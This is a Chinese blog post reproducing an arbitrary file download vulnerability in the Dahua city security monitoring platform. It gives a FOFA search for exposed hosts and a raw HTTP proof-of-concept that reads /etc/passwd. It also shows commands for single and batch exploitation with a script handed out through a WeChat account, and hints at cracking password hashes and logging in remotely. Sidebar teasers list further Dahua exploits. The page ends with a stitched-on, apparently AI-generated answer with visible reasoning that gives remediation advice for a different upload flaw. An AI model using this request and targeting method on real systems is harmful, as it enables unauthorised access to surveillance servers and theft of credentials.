大华城市安防系统平台任意文件下载漏洞

最新推荐文章于 2024-07-07 21:45:44 发布

为赋新词强说愁

最新推荐文章于 2024-07-07 21:45:44 发布

阅读量1k

点赞数 1

CC 4.0 BY-SA版权

文章标签： web安全网络安全系统安全

本文链接：https://blog.youkuaiyun.com/CommputerMac/article/details/133623505

一、漏洞描述

大华城市安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式，包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外，该平台还支持多种报警方式，包括移动侦测、区域入侵、越线报警、人员聚集等。

大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件。

二、网络空间搜索引擎查询

fofa查询

app="dahua-DSS"

三、漏洞复现

poc

GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

浏览器直接访问 http://ip:port/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd，可下载文件

四、批量检测与利用

单个检测与利用

 python .\DDS-Download.py -u http://ip:port

对密码进行解密（MD5免费在线解密破解_MD5在线加密-SOMD5 或者 md5在线解密破解,md5解密加密）

点到为止，远程登录服务器，这里就不在演示了。

批量检测

python .\DDS-Download.py -f  filename

关注微信公众号网络安全透视镜回复 20231007 获取检测利用脚本

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

为赋新词强说愁

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【漏洞复现】大华DSS数字监控系统配置系统后台弱口令漏洞

晚风不及你

03-08

1995

大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统，除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外，更注重用户使用的便利性。

大华 DSS 数字监控系统 user_edit.action 信息泄露漏洞复现

0xSec

05-30

1472

大华 DSS 数字监控系统 user_edit.action 接口处存在信息泄露漏洞。未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码等信息，破解密码后可直接登录后台，使系统处于极不安全的状态。

参与评论您还未登录，请先登录后发表或查看评论

漏洞复现--大华城市安防系统平台任意文件下载（poc）

qq_53003652的博客

10-07

561

大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件。用户密码存放在etc/shadow下，读取etc/shadow。点到为止，拿到密码后可以干什么懂得都懂，这里也是不演示了。成功读取etc/passwd。自行查询厂商发布补丁。

【漏洞复现】大华DSS视频管理系统信息泄露漏洞

晚风不及你

02-20

3072

【复现】大华 DSS 数字监控系统 任意文件读取漏洞_38

fushuang333的博客

02-03

1840

【复现】大华 DSS 数字监控系统 任意文件读取漏洞，通过提交专门设计的输入，攻击者就可以在被访问的文件系统中读取或写入任意内容。

大华城市安防监控系统平台管理存在任意文件下载漏洞

剁椒鱼头没剁椒的博客

02-14

3056

大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件。刷新登录页面进行抓包，然后在数据包中添加POC。大华城市安防监控系统平台管理。

大华智慧园区综合管理平台任意文件下载

Bnessy

10-29

275

【代码】大华智慧园区综合管理平台任意文件下载。

大华城市安防监控系统平台 任意文件下载漏洞复现(QVD-2023-20736)

0xSec

02-01

655

大华城市安防监控系统平台 attachment_downloadByUrlAtt.action接口存在任意文件下载漏洞，未经身份验证的攻击者可以获取系统内部敏感文件信息，使系统处于极不安全的状态。

【漏洞复现】大华DSS城市安防监控平台任意文件读取漏洞

晚风不及你

03-05

1201

大华DSS数字监控系统平台存在任意文件读取漏洞，攻击者可以通过此漏洞获取服务器上的任意文件，造成敏感信息泄露。

【漏洞复现】大华城市安防监控系统平台 任意文件下载漏洞

KKleeeaa的博客

02-01

899

任意文件下载

大华城市安防监控系统平台attachment_downloadByUrlAtt.action存在任意文件读取漏洞附POC软件

nnn2188185的博客

02-02

220

大华城市安防监控系统平台attachment_downloadByUrlAtt.action存在任意文件读取漏洞附POC软件

大华城市安防监控系统平台 任意文件下载(QVD-2023-20736)

weixin_43567873的博客

03-08

208

大华城市安防监控系统平台 任意文件下载(QVD-2023-20736)

【漏洞复现】大华-城市安防监控系统平台管理-SQL注入-itcBulletin

知黑而守白

06-19

339

DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。可将视频监控、卡口拍照、区间测速、电子地图、违章查询系统等诸多主流应用整合在一起，实现更加智能、便捷的分级查询服务。大华DSS itcBulletin 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

大华DSS user_toLoginPage.action命令执行漏洞

Keepb1ue的博客

07-07

923

大华DSS 数字监控系统是大华开发的一款安防视频监控系统，拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华存在前台命令执行漏洞，攻击者可以通过此漏洞获取服务器权限。

【复现】大华DSS信息泄露漏洞_15

fushuang333的博客

01-11

2527

【复现】大华DSS信息泄露漏洞，DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。

【漏洞复现】大华-DSS-attachment_downloadByUrlAtt-文件读取

知黑而守白

02-01

215

DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。可将视频监控、卡口拍照、区间测速、电子地图、违章查询系统等诸多主流应用整合在一起，实现更加智能、便捷的分级查询服务。大华DSS attachment_downloadByUrlAtt 接口存在一个任意文件读取漏洞，攻击者可以通过构造精心设计的请求，成功利用漏洞读取服务器上的任意文件，包括敏感系统文件和应用程序配置文件等。通过利用此漏洞，攻击者可能获得系统内的敏感信息，导致潜在的信息泄露风险。

大华 DSS 城市安防数字监控系统 SQL 注入漏洞

Keepb1ue的博客

12-21

1790

大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，可通过注入漏洞获取数据库敏感信息。

大华股份监控存在高危漏洞【附POC】

jijisaq的博客

03-27

1693

同时，它还可以通过采集监控数据、提高管理监督效果，有效震慑违法犯罪行为的发生，并达到有效震慑违法犯罪行为的效果。大华DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！今年肯定能“一帆风顺，二龙腾飞，三羊开泰，四季平安，五福临门，六六大顺，七星高照，八方来财，九九同心，十全十美，百事亨通，千事吉祥，万事如意“。

大华监控DSS存在SQL注入高危漏洞

wan___she__pi的博客

03-27

1035

大华DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。将视频监控、卡口拍照、区间测速、电子地图、违章查询系统等诸多主流应用整合，实现更加智能、便捷的分级查询服务。大华 DSS 数字监控系统存在File.action SQL注入，黑客可以利用该漏洞执行任意SQL语句，获取敏感信息，造成危害。

大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞

最新发布

03-24

<think>好的，我需要处理用户关于大华智慧园区综合管理平台bitmap接口任意文件上传漏洞的修复方案请求。首先，我需要回顾提供的引用内容，确保准确理解漏洞的具体情况和现有信息。根据引用[1]、[2]、[3]和[4]，漏洞出现在/soap/bitmap或/emap/webservice/gis/soap/bitmap接口处，攻击者可上传恶意文件获取服务器权限。修复的关键点包括文件类型验证、大小限制、路径过滤、权限控制等。接下来，用户需要的是修复方案。我需要将这些引用中的信息整合成结构化的建议，确保每个措施都有依据。例如，引用[2]提到未限制文件类型和大小，因此修复措施应包括白名单验证和大小限制。引用[3]提到路径过滤不足，所以需要安全路径配置。引用[4]建议限制访问来源，因此需要网络层防护。同时，要注意使用中文回答，符合用户要求。避免技术术语过于复杂，确保清晰易懂。需要分步骤列出修复方案，并补充临时缓解措施，如引用[4]提到的限制暴露在公网。最后，生成相关问题时要围绕漏洞修复、检测、影响和案例，确保问题相关且有价值。检查是否有遗漏的引用内容，并确保所有建议都有对应的引用支持，如引用编号正确。现在组织回答结构：漏洞描述、修复方案（分点）、临时措施、引用来源，最后相关问题。确保每个修复点都有对应的引用标注，例如文件类型验证对应引用[2]，路径过滤对应引用[3]等。</think>### 大华智慧园区综合管理平台bitmap接口任意文件上传漏洞修复方案 #### 漏洞描述该漏洞存在于平台的`/emap/webservice/gis/soap/bitmap`接口（部分版本路径为`/soap/bitmap`），由于未对上传文件的类型、大小、路径及权限进行严格过滤，导致攻击者可构造恶意文件（如WebShell）直接上传至服务器，进而获取系统控制权限[^1][^2][^3]。 --- #### 修复方案（分步骤） 1. **文件类型白名单验证** - 限制上传文件扩展名为业务必需的类型（如`.jpg`、`.png`等），禁止`.jsp`、`.php`、`.war`等可执行文件类型。 - 示例代码实现： ```java String[] allowedTypes = {"jpg", "png", "gif"}; if (!Arrays.asList(allowedTypes).contains(fileExt)) { throw new SecurityException("非法文件类型"); } ``` 2. **文件内容与格式校验** - 使用文件头校验（Magic Number）判断真实文件类型，避免通过修改扩展名绕过检测。 - 示例：通过`BufferedImage`类验证图片文件合法性。 3. **文件大小与上传频率限制** - 设定单文件最大尺寸（如10MB）及单位时间内上传次数阈值，防止大文件攻击或DoS。 4. **安全路径配置** - 禁止用户指定上传路径，固定文件存储目录为不可执行区域（如非Web根目录）[^3]。 - 配置示例（Nginx）： ```nginx location /uploads/ { deny all; # 禁止直接访问上传目录 } ``` 5. **权限最小化原则** - 将上传接口服务运行账户权限降级，限制其对系统关键目录的写入/执行权限[^3]。 6. **接口身份认证加固** - 为上传接口添加Token验证或Session校验，禁止未授权访问[^4]。 7. **日志监控与告警** - 记录上传操作的IP、时间、文件哈希等，对异常行为（如高频上传、非常规文件类型）触发实时告警[^4]。 --- #### 临时缓解措施若无法立即修复，建议： 1. 通过防火墙策略限制`/soap/bitmap`接口仅允许内网IP访问[^4]。 2. 使用WAF（Web应用防火墙）拦截包含`<%`、`<?php`等危险字符的上传请求[^4]。 --- #### 参考来源 : 大华智慧园区综合管理平台bitmap文件上传漏洞描述 : 漏洞成因分析（文件类型/大小未过滤） : 接口路径与权限配置缺陷说明 [^4]: 网络暴露风险与临时防护建议 ---